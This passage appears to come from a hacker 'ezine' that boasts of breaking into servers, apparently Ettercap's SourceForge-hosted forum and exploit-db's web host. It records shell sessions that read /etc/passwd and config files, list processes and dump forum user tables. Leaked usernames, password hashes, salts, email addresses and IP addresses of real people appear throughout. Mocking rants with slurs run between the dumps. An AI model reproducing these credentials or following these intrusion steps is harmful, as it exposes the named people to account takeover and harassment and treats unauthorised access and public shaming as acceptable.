n3tw0rkTeRr0r15M inj3ct0r 10850 Jun 29 15:30 groupsubscription.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 9375 Jun 29 15:30 image.php +dr-xr-xr-x 5 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 27 19:42 images +dr-xr-xr-x 6 n3tw0rkTeRr0r15M inj3ct0r 12288 Jun 6 14:01 includes +-rwxrwxrwx 1 n3tw0rkTeRr0r15M 
inj3ct0r 19444 Sep 26 12:27 index.php +dr-xr-xr-x 6 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 22 16:28 infernoshout +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 11103 Jun 29 15:30 infernoshout.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 44256 Jun 29 15:30 infraction.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 183249 Jun 29 15:31 inlinemod.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 10670 Jun 29 15:31 joinrequests.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 11052 Jun 29 15:31 login.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 17392 Jun 29 15:31 member.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 16259 Jun 29 15:31 member_inlinemod.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 36229 Jun 29 15:31 memberlist.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 24194 Jun 29 15:31 misc.php +dr-xr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:00 modcp +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 63652 Jun 29 15:32 moderation.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 7084 Jun 29 15:32 moderator.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 1889 Jun 29 15:32 myip.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 18804 Jun 29 15:32 newattachment.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 37429 Jun 29 15:33 newreply.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 19239 Jun 29 15:33 newthread.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 19932 Jun 29 15:33 online.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 8024 Jun 29 15:33 payment_gateway.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 12238 Jun 29 15:33 payments.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 8217 Jun 29 15:34 picture.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 22368 Jun 29 15:33 picture_inlinemod.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 25635 Jun 29 15:34 picturecomment.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 27740 Jun 29 15:34 poll.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 9840 Jun 29 15:34 posthistory.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 74696 Jun 29 15:34 postings.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 6921 Jun 29 15:34 
printthread.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 71068 Jun 29 15:34 private.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 152656 Jun 29 15:35 profile.php +dr-xr-xr-x 3 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 22 22:02 r00tpan3l123lol +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 40079 Jun 29 15:35 register.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 6015 Jun 29 15:35 report.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 14047 Jun 29 15:35 reputation.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 125045 Jun 29 15:35 search.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 21274 Jun 29 15:35 sendmessage.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 10337 Jun 29 15:36 showgroups.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 12716 Jun 29 15:36 showpost.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 73853 Jun 29 15:36 showthread.php +dr-xr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:00 signaturepics +dr-xr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 22 15:42 smilies +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 17014 Jun 29 15:36 spy.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 33204 Jun 29 15:36 subscription.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 13693 Jun 29 15:36 tags.php +dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r 4096 Jul 22 12:03 tech_blue +dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r 4096 Jul 19 22:04 tech_dark +dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r 4096 Jul 19 22:04 tech_white +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 9020 Jun 29 15:36 threadrate.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 12743 Jun 29 15:36 threadtag.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 34836 Jun 29 15:37 usercp.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 19423 Jun 29 15:37 usernote.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 29903 Jun 29 15:37 validator.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 27705 Jun 29 15:37 visitormessage.php + +$ cat includes/config.php +ob0J%H?EB_&*9z(q7:v%w)j,yx:shell_c99@yahoo.com:122.164.235.10: +L0rd 
CrusAd3r:2685fd80293b5b6cf1a2d2f488b2db72:{pmYzcy%QfgFy0ftJ?_>"F|L42vtcK:lord.v5111@gmail.com:59.92.22.151: +Inj3ct0r:170aebb9d6ba17f411e90b931421f703:.Q:eI}"c";[e`?'o6N/al|}RE;-mNU:admin@admin.com:: +eidelweiss:cd0c84191f189462696ec6de04a5455b:KNU@c;qRh;j$Qc9Vp+r=:$}mFtE1ZHRD(LW/Uvhj:jimsalimg@msn.com:41.252.59.225: +KnocKout:64f26f1e22bba61290603bc8f514a56d:`gXoY<&>G~m02Z)EMJK{*oRa\>8aAr:mmertocan@gmail.com:88.242.249.163: +anT!-Tr0J4n:b6f1b2d02236cb9bc983482c5789999c:`dFJd>n&KjhTtynf#L05jSQ%h'=jsl:rnoom_h@yahoo.com:41.191.28.15: + +,_._._._._._._._|____________________________________________________ +|_|_|_|_|_|_|_|_|___________________________________________________/ + ~ ettercap ~ ! + +You would think that the authors of Ettercap, one of the most popular +whitehat pentesting tools, would know the basics of security. +Apparently they don't, or they just don't give a shit about what +happens to their users. + +So, why is their website so insecure? Ettercap's message board is +hosted at Sourceforge, so they share a server with thousands of other +customers. Every single customer is able to execute commands and +access the other project directories. Pretty stupid, eh? You only need +to find one hole in one hosted site and you can access ALL the project +databases. Of course that isn't ALoR's fault, it's Sourceforge's +fault. Regardless, people who care about security and data integrity +wouldn't use such a shitty provider, would they? To be fair, the +Ettercap project is dead. Most of the admins have been inactive for a +few years now, but that is no excuse for such a security mess. +Especially since the server was compromised some five years ago. + +Just look at the process list, horrible. Even the worst perl bots +(scax) get access. If such a poorly written bot can own this box, +everyone can. + +Some good advice to all other people/projects who are using +Sourceforge: Move. There are enough good alternatives. 
Yes, I am +talking to you Vim, get the fuck out of there. And to all Ettercap +users: arp poisoning is *not* hacking. If you want to achieve +something real, learn the fundamentals and not how to use a GUI. Don't +sniff the passwords of your friends and call yourself a pentester +(looking at you firesheep). + + _ _ + | | | | + ___| |_| |_ ___ _ __ ___ _ __ __ _ __ + / _ \ __| __/ _ \ '__/ __| '__|/ \ | '_ \ + | __/ |_| || __/ | | (__| | / /\ \ | |_) | + \___|\__|\__\___|_| \___|_| /_/ \_\| .__/ + | | + |_| + Baa. + I flood SID's + I'm a Hacker!! Baa. + Baa. Baa. I sit at starbucks +I sniff packets | I'm a Hacker!! +I'm a Hacker!! | Baa. +Baa.. | / + \ __ _ | / YOUR ALL FUCKING + \ .-.' `; `-._ __ _ __ _ SHEEP. + \ (_, .-:' `; `-._.-.:' `; `-._ + ,'o"( "HACKE(_, (_, ) + (__,-' ,'o"( "HACKE,'o"( "HACKER" )> STOP BEING SHEEP! + ( (__,-' (__,-' ) + `-'._.--._( ( ) FUCKING INNOVATE! + ||| |||`-'._.--._.-' `-'._.--._.-' + ||| ||| ||| ||| + +$ uname -a +Linux sfp-web-9.v30.ch3.sourceforge.com 2.6.18-194.11.4.el5 #1 SMP Tue Sep 21 05:04:09 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux + +$ id +uid=48(apache) gid=48(apache) groups=48(apache),302(amqp) + +$ cat /etc/passwd +root:x:0:0:root:/root:/bin/bash +bin:x:1:1:bin:/bin:/sbin/nologin +daemon:x:2:2:daemon:/sbin:/sbin/nologin +adm:x:3:4:adm:/var/adm:/sbin/nologin +lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin +sync:x:5:0:sync:/sbin:/bin/sync +shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown +halt:x:7:0:halt:/sbin:/sbin/halt +mail:x:8:12:mail:/var/spool/mail:/sbin/nologin +news:x:9:13:news:/etc/news: +uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin +operator:x:11:0:operator:/root:/sbin/nologin +games:x:12:100:games:/usr/games:/sbin/nologin +gopher:x:13:30:gopher:/var/gopher:/sbin/nologin +ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin +nobody:x:99:99:Nobody:/:/sbin/nologin +dbus:x:81:81:System message bus:/:/sbin/nologin +nscd:x:28:28:NSCD Daemon:/:/sbin/nologin +vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin 
+exim:x:93:93::/var/spool/exim:/sbin/nologin +rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin +rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin +nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin +sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin +pcap:x:77:77::/var/arpwatch:/sbin/nologin +avahi:x:70:70:Avahi daemon:/:/sbin/nologin +ntp:x:38:38::/etc/ntp:/sbin/nologin +rpm:x:37:37::/var/lib/rpm:/sbin/nologin +haldaemon:x:68:68:HAL daemon:/:/sbin/nologin +xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin +named:x:25:25:Named:/var/named:/sbin/nologin +sashroot:x:0:500:sashroot:/sashroot:/bin/bash +osiris:x:300:300:Osiris Daemon:/var/lib/osiris:/sbin/nologin +puppet:x:301:301:Puppet:/var/lib/puppet:/sbin/nologin +apache:x:48:48:Apache:/var/www:/sbin/nologin +vhost:*:310:310:Vhost User:/home/vhost:/bin/bash +rtstats:*:442:442:RTstats user:/var/local/stats:/bin/bash +nginx:x:443:443:Nginx user:/var/lib/nginx:/bin/false +nrpe:x:444:446:NRPE user for the NRPE service:/:/sbin/nologin +dummy:*:103:103:projectweb dummy user:/home/dummy:/bin/false +www:*:448:448:WWW User:/var/www:/bin/bash +sfeng:*:333:333:SF Engineer:/home/sfeng:/bin/rbash +sfeng2:*:332:332:SF Engineer 2:/home/sfeng2:/bin/bash +avahi-autoipd:x:449:449:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin +oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin +munin:x:450:450:Munin user:/var/lib/munin:/sbin/nologin +rrdcached:x:451:451:rrdcached:/var/rrdtool/rrdcached:/sbin/nologin + +$ ps auxwww +USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND +root 1 0.0 0.0 10352 80 ? Ss Sep28 0:46 init [3] +root 2 0.0 0.0 0 0 ? S< Sep28 1:58 [migration/0] +root 3 0.0 0.0 0 0 ? SN Sep28 0:01 [ksoftirqd/0] +root 4 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/0] +root 5 0.0 0.0 0 0 ? S< Sep28 0:03 [migration/1] +root 6 0.0 0.0 0 0 ? SN Sep28 0:48 [ksoftirqd/1] +root 7 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/1] +root 8 0.0 0.0 0 0 ? 
S< Sep28 0:03 [migration/2] +root 9 0.0 0.0 0 0 ? SN Sep28 0:09 [ksoftirqd/2] +root 10 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/2] +root 11 0.0 0.0 0 0 ? S< Sep28 0:03 [migration/3] +root 12 0.0 0.0 0 0 ? SN Sep28 1:42 [ksoftirqd/3] +root 13 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/3] +root 14 0.0 0.0 0 0 ? S< Sep28 0:14 [migration/4] +root 15 0.0 0.0 0 0 ? SN Sep28 0:02 [ksoftirqd/4] +root 16 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/4] +root 17 0.0 0.0 0 0 ? S< Sep28 0:20 [migration/5] +root 18 0.0 0.0 0 0 ? SN Sep28 0:04 [ksoftirqd/5] +root 19 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/5] +root 20 0.0 0.0 0 0 ? S< Sep28 0:09 [migration/6] +root 21 0.0 0.0 0 0 ? SN Sep28 0:03 [ksoftirqd/6] +root 22 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/6] +root 23 0.0 0.0 0 0 ? S< Sep28 0:08 [migration/7] +root 24 0.0 0.0 0 0 ? SN Sep28 0:03 [ksoftirqd/7] +root 25 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/7] +root 26 0.0 0.0 0 0 ? S< Sep28 0:00 [events/0] +root 27 0.0 0.0 0 0 ? S< Sep28 0:00 [events/1] +root 28 0.0 0.0 0 0 ? S< Sep28 0:00 [events/2] +root 29 0.0 0.0 0 0 ? S< Sep28 0:00 [events/3] +root 30 0.0 0.0 0 0 ? S< Sep28 0:00 [events/4] +root 31 0.0 0.0 0 0 ? S< Sep28 0:00 [events/5] +root 32 0.0 0.0 0 0 ? S< Sep28 0:00 [events/6] +root 33 0.0 0.0 0 0 ? S< Sep28 0:00 [events/7] +root 34 0.0 0.0 0 0 ? S< Sep28 0:00 [khelper] +root 105 0.0 0.0 0 0 ? S< Sep28 0:00 [kthread] +root 116 0.0 0.0 0 0 ? S< Sep28 0:00 [kblockd/0] +root 117 0.0 0.0 0 0 ? S< Sep28 0:01 [kblockd/1] +root 118 0.0 0.0 0 0 ? S< Sep28 0:00 [kblockd/2] +root 119 0.0 0.0 0 0 ? S< Sep28 0:01 [kblockd/3] +root 120 0.0 0.0 0 0 ? S< Sep28 0:00 [kblockd/4] +root 121 0.0 0.0 0 0 ? S< Sep28 0:00 [kblockd/5] +root 122 0.0 0.0 0 0 ? S< Sep28 0:00 [kblockd/6] +root 123 0.0 0.0 0 0 ? S< Sep28 0:01 [kblockd/7] +root 124 0.0 0.0 0 0 ? S< Sep28 0:00 [kacpid] +root 237 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/0] +root 238 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/1] +root 239 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/2] +root 240 0.0 0.0 0 0 ? 
S< Sep28 0:00 [cqueue/3] +root 241 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/4] +root 242 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/5] +root 243 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/6] +root 244 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/7] +root 247 0.0 0.0 0 0 ? S< Sep28 0:00 [khubd] +root 249 0.0 0.0 0 0 ? S< Sep28 0:00 [kseriod] +root 364 0.0 0.0 0 0 ? S Sep28 0:00 [khungtaskd] +root 367 0.0 0.0 0 0 ? S< Sep28 29:37 [kswapd0] +root 368 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/0] +root 369 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/1] +root 370 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/2] +root 371 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/3] +root 372 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/4] +root 373 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/5] +root 374 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/6] +root 375 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/7] +root 539 0.0 0.0 0 0 ? S< Sep28 0:00 [kpsmoused] +root 618 0.0 0.0 0 0 ? S< Sep28 0:00 [scsi_eh_0] +root 637 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/0] +root 638 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/1] +root 639 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/2] +root 640 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/3] +root 641 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/4] +root 642 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/5] +root 643 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/6] +root 644 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/7] +root 645 0.0 0.0 0 0 ? S< Sep28 0:00 [ata_aux] +root 664 0.0 0.0 0 0 ? S< Sep28 0:00 [scsi_eh_1] +root 665 0.0 0.0 0 0 ? S< Sep28 5:14 [usb-storage] +root 667 0.0 0.0 0 0 ? S< Sep28 0:00 [scsi_eh_2] +root 668 0.0 0.0 0 0 ? S< Sep28 1:45 [usb-storage] +root 679 0.0 0.0 0 0 ? S< Sep28 0:00 [kstriped] +root 716 0.0 0.0 0 0 ? S< Sep28 0:00 [ksnapd] +root 755 0.0 0.0 0 0 ? S< Sep28 30:00 [kjournald] +root 780 0.0 0.0 0 0 ? S< Sep28 0:02 [kauditd] +root 813 0.0 0.0 12764 168 ? 
S + +$ SELECT phpbb_users.username, phpbb_users.user_password, phpbb_users.user_email, +phpbb_ranks.rank_title FROM phpbb_users LEFT JOIN phpbb_ranks ON user_rank = rank +id WHERE user_rank > 0 ORDER BY user_rank +NaGA:256ce2d528caee146c82f20a3378673f:naga@antifork.org:Ettercap Developer +ares:9c05a83765c4aad064d737496dae2dee:ares@inwind.it:Supporter +metaldemon:3ef4f11188954e64884037cae7c3e963:metaldemon@tiscalinet.it:Supporter +ttyp1:3c5e778f14dee668c0a9560fb8a6ced2:yokel4@anonymous.to:Betatester +drygol:c8214d5d4d4eb4b45d2bca063c07dd6a:pandrychowski@lpp.com.pl:Betatester +Gumble:ce7bcda695c30aa2f9e5f390c820d985:dukegumble@redseven.de:Betatester +Acelent:817b61c60959294d4250912f816f9451:acelent@gmail.com:Betatester +Jammer:a13f5ed8c46f26076c20fd4829901bc8:jammer@mauigateway.com:Betatester +m|n|moE:de9cb5d4ae42da6b8eb6623c322fa200:minimoe@home.se:Betatester +Crusher4:2df66ae5eb0807dd2b84933adf3c4981:Crusher4@mac.com:Betatester +MathieuMa:f8c22494a40f2c034aa73b891135da85:math.m@promac.org:Betatester +Mapes:3e1bbf17e6528381ae1e1e596733fb9a:bellizzi@pacbell.net:Betatester +garaged:3c2234a7ce973bc1700e0c743d6a819c:maxvaldez@yahoo.com:Betatester +Piw:a980baafb7bdb3d71aec6fc3776323ac:piw69@rpg.pl:Betatester +mod7:e40fbc4015c12f4c97e5e65b38127a96:ghy7765@yahoo.com:Betatester +stromax:274216f1c8423d3bad9cc3f684e31ffa:thomas@limone.ch:Betatester +DigitalDust:e80eded141e1295d694cd35cf2b8f675:jason@evilroot.net:Betatester +cableguy:37430a92973d1adca9934f0a5ecc53d2:cableguy@iname.com:Betatester +Suntac:9e220ad44ce3cae2c5dd5a6a6e770837:Suntac@dds.nl:Betatester +SGResu:0d736aad1ff5a82ca580e7980f2de88d:sgresu@hotmail.com:joker +LnZ:292b804c2895989cebef7340971d1e8d:lporro@libero.it:fac totum +megabug:74b468fafab62ade90622085691026dd:megabug@xerxes.stru.polimi.it: +Zero_Chaos:7b24afc8bc80e548d66c4e7ff72171c5:sidhayn@hotmail.com:Contributor +daten:eff1541059e9a263b245657e1805b339:daten@users.sourceforge.net:Contributor + + + 
____________________________________________________|_._._._._._._._, + \___________________________________________________|_|_|_|_|_|_|_|_| + ! ~ exploit-db ~ + +Now we come to a different topic. A topic about people who leech off +what the scene creates and call it their own. About people who +copyright ideas and papers about security related topics that have +been around for years. How many XSS-Papers are there currently on +exploit-db? How many retarded strcpy(buf, argv[1])-papers are being +written over and over again? About whitehats who think releasing +exploits would make the world much more safe. And because of fame. +They all want fame so badly that they do anything and everything in +order to be part of the security industry. What's even more hilarious +is that these "famous" security people keep getting owned. We mean +el8, phc, h0no, and zf0 have all owned these "Security Rockstar" +faggots and yet, nothing changes. Or the attacks are categorized as +"skiddy" behavior. It's rediculous how terrible the industry is. There +is no accountability anymore. + +Still there are some lame skids that need a good spanking. Stupid 10 +year olds who take perl-exploits to destroy clan-pages for fun and +call themselves "hackers" without knowing what they are doing. +Criminals who take exploits to steal payment stuff for their own +selfish financial gain. And to get their friends thrown in jail +(soup). Fame and money... Get the message? + +$ uname -a +Linux www 2.6.32-25-server #45-Ubuntu SMP Sat Oct 16 20:06:58 UTC 2010 x86_64 GNU/Linux + +$ id +uid=33(www-data) gid=33(www-data) groups=33(www-data) + +$ pwd +/var/www + +$ ls -la +total 24180 +drwxr-xr-x 18 www-data www-data 4096 Nov 26 10:16 . +drwxr-xr-x 19 root root 4096 Sep 24 09:26 .. 
+-rw-r--r-- 1 www-data www-data 1005 Nov 12 19:03 .htaccess +-rw-r--r-- 1 www-data www-data 764 Nov 5 17:32 .htaccess.save +-rw-r--r-- 1 www-data www-data 2820676 Nov 15 14:26 1920x1200_edb-wallpaper.png +drwxr-xr-x 4 www-data www-data 4096 Nov 11 07:43 92384723987239847239847234982734 +-rw-r--r-- 1 www-data www-data 46149 Nov 11 17:04 apc123456.php +-rw-r--r-- 1 www-data www-data 10723590 Nov 28 06:52 archive.tar.bz2 +-rw-r--r-- 1 www-data www-data 18851 Jul 9 14:42 disclosure.html +-rw-r--r-- 1 www-data www-data 11662 Nov 11 11:42 dorkorinos.txt +drwxr-xr-x 2 www-data www-data 4096 Jul 9 14:42 edbpartners +-rw-r--r-- 1 www-data www-data 1406 Jul 9 14:53 favicon.ico +-rw-r--r-- 1 www-data www-data 1921 Jul 9 14:42 feature.txt +-rw-r--r-- 1 www-data www-data 1923 Jul 11 16:01 feature1.txt +drwxr-xr-x 21 www-data www-data 4096 Nov 22 20:06 forums +drwxr-xr-x 2 www-data www-data 4096 Sep 23 06:41 funny404 +-rw-r--r-- 1 www-data www-data 1119 Nov 22 07:45 gd_rss.php +-rw-r--r-- 1 www-data www-data 65 Aug 26 04:53 goaway.php +-rw-r--r-- 1 www-data www-data 53 Jul 9 14:42 googled6c4817aa45e0032.html +-rw-r--r-- 1 www-data www-data 5 Nov 11 07:24 hola.txt +-rw-r--r-- 1 www-data www-data 3154634 Nov 11 07:25 hola.xml +drwxr-xr-x 15 www-data www-data 4096 Nov 22 15:50 images +-rw-r--r-- 1 www-data www-data 397 Aug 26 04:53 index.php +drwxr-xr-x 2 www-data www-data 4096 Nov 4 12:20 leetdownloads +-rw-r--r-- 1 www-data www-data 311 Nov 12 18:40 maintenance.php +drwxr-xr-x 2 root root 4096 Nov 26 10:18 movies +-rw-r--r-- 1 www-data www-data 106 Aug 26 04:53 news.php +drwxr-xr-x 2 www-data www-data 4096 Nov 11 17:20 nginx-default +-rw-r--r-- 1 www-data www-data 220 Oct 30 17:00 pagerank.html +-rw-r--r-- 1 www-data www-data 761 Sep 6 06:12 rating.txt +-rw-r--r-- 1 www-data www-data 9122 Aug 18 05:32 readme.html +-rw-r--r-- 1 www-data www-data 47 Jul 9 14:53 robots_ssl.txt +-rw-r--r-- 1 www-data www-data 4007150 Dec 1 07:47 ror.xml +-rw-r--r-- 1 www-data www-data 2102 Sep 1 
05:40 rss.php +drwxr-xr-x 2 www-data www-data 4096 Jul 9 14:42 scripts +-rw-r--r-- 1 www-data www-data 1056 Sep 3 18:05 search-mobile.php +-rw-r--r-- 1 www-data www-data 108 Aug 26 04:53 search.php +-rw-r--r-- 1 www-data www-data 3337393 Dec 1 07:47 sitemap.xml +-rw-r--r-- 1 www-data www-data 3462 Aug 19 11:37 sitemap.xsl +-rw-r--r-- 1 www-data www-data 30533 Nov 30 17:52 sitemap_blog.xml +-rw-r--r-- 1 www-data www-data 4229 Nov 30 17:52 sitemap_blog.xml.gz +drwxr-xr-x 3 www-data www-data 4096 Jul 9 14:42 slider +drwxr-xr-x 2 www-data www-data 20480 Dec 4 09:18 sploits +-rw-r--r-- 1 www-data www-data 9621 Nov 3 19:52 style.css +drwxr-xr-x 2 www-data www-data 4096 Sep 23 06:40 testme +-rw-r--r-- 1 www-data www-data 5699 Nov 4 07:22 tpl_search.php +-rw-r--r-- 1 www-data www-data 16 Nov 28 06:52 update-982374.txt +-rw-r--r-- 1 www-data www-data 50 Aug 26 04:53 updated.php +drwxr-xr-x 3 www-data www-data 4096 Aug 3 09:35 videos +-rw-r--r-- 1 www-data www-data 4391 Aug 26 04:53 wp-activate.php +drwxr-xr-x 8 www-data www-data 4096 Nov 11 17:59 wp-admin +-rw-r--r-- 1 www-data www-data 40284 Aug 26 04:53 wp-app.php +-rw-r--r-- 1 www-data www-data 220 Aug 26 04:53 wp-atom.php +-rw-r--r-- 1 www-data www-data 274 Aug 26 04:53 wp-blog-header.php +-rw-r--r-- 1 www-data www-data 3926 Aug 26 04:53 wp-comments-post.php +-rw-r--r-- 1 www-data www-data 238 Aug 26 04:53 wp-commentsrss2.php +-rw-r--r-- 1 www-data www-data 3173 Aug 26 04:53 wp-config-sample.php +-rw-r--r-- 1 www-data www-data 2832 Nov 11 17:59 wp-config.php +drwxr-xr-x 8 www-data www-data 4096 Dec 3 22:49 wp-content +-rw-r--r-- 1 www-data www-data 1255 Aug 26 04:53 wp-cron.php +-rw-r--r-- 1 www-data www-data 240 Aug 26 04:53 wp-feed.php +drwxr-xr-x 7 www-data www-data 4096 Sep 8 13:52 wp-includes +-rw-r--r-- 1 www-data www-data 2002 Aug 26 04:53 wp-links-opml.php +-rw-r--r-- 1 www-data www-data 2441 Aug 26 04:53 wp-load.php +-rw-r--r-- 1 www-data www-data 26160 Sep 3 21:48 wp-login.php +-rw-r--r-- 1 www-data www-data 
7774 Aug 26 04:53 wp-mail.php +-rw-r--r-- 1 www-data www-data 487 Aug 26 04:53 wp-pass.php +-rw-r--r-- 1 www-data www-data 218 Aug 26 04:53 wp-rdf.php +-rw-r--r-- 1 www-data www-data 316 Aug 26 04:53 wp-register.php +-rw-r--r-- 1 www-data www-data 218 Aug 26 04:53 wp-rss.php +-rw-r--r-- 1 www-data www-data 220 Aug 26 04:53 wp-rss2.php +-rw-r--r-- 1 www-data www-data 9177 Sep 8 13:01 wp-settings.php +-rw-r--r-- 1 www-data www-data 18695 Aug 26 04:53 wp-signup.php +-rw-r--r-- 1 www-data www-data 3702 Aug 26 04:53 wp-trackback.php +-rw-r--r-- 1 www-data www-data 93955 Aug 26 04:53 xmlrpc-orig.php +-rw-r--r-- 1 www-data www-data 94184 Aug 26 04:53 xmlrpc.php + + +$ cat wp-config.php + boot/initrd.img-2.6.32-26-server +lrwxrwxrwx 1 root root 32 Oct 4 16:30 initrd.img.old -> boot/initrd.img-2.6.32-25-server +drwxr-xr-x 13 root root 12288 Nov 18 06:54 lib +lrwxrwxrwx 1 root root 4 Jul 9 05:28 lib64 -> /lib +drwx------ 2 root root 16384 Jul 9 05:28 lost+found +drwxr-xr-x 2 root root 4096 Jul 9 15:17 maint +drwxr-xr-x 3 root root 4096 Jul 9 05:28 media +drwxr-xr-x 4 root root 4096 Jul 9 20:03 mnt +drwxr-xr-x 3 root root 4096 Oct 7 16:53 opt +dr-xr-xr-x 227 root root 0 Nov 11 10:45 proc +drwx------ 9 root root 4096 Nov 25 09:08 root +drwxr-xr-x 2 root root 4096 Oct 29 19:00 sbin +drwxr-xr-x 2 root root 4096 Dec 5 2009 selinux +drwxr-xr-x 2 root root 4096 Jul 9 05:28 srv +drwxr-xr-x 13 root root 0 Nov 11 10:45 sys +drwxrwxrwt 3 root root 4096 Dec 4 14:59 tmp +drwxr-xr-x 10 root root 4096 Jul 9 05:28 usr +drwxr-xr-x 19 root root 4096 Sep 24 09:26 var +lrwxrwxrwx 1 root root 29 Nov 30 06:53 vmlinuz -> boot/vmlinuz-2.6.32-26-server +lrwxrwxrwx 1 root root 29 Oct 4 16:30 vmlinuz.old -> boot/vmlinuz-2.6.32-25-server + +$ cat /etc/passwd +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/bin/sh +bin:x:2:2:bin:/bin:/bin/sh +sys:x:3:3:sys:/dev:/bin/sh +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/bin/sh +man:x:6:12:man:/var/cache/man:/bin/sh 
